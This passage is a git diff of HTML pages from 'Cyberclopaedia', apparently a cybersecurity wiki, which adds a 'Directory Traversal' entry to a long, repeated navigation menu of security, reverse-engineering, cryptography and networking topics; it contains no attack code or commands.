        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -177,22 +177,6 @@

Introduction - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Domain Controllers.html b/docs/System Internals/Windows/Active Directory (AD)/Domain Controllers.html index baf4ff16..6e6febe8 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Domain Controllers.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Domain Controllers.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -183,22 +183,6 @@

Introduction - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Groups.html b/docs/System Internals/Windows/Active Directory (AD)/Groups.html index b22365c0..e06d9dad 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Groups.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Groups.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
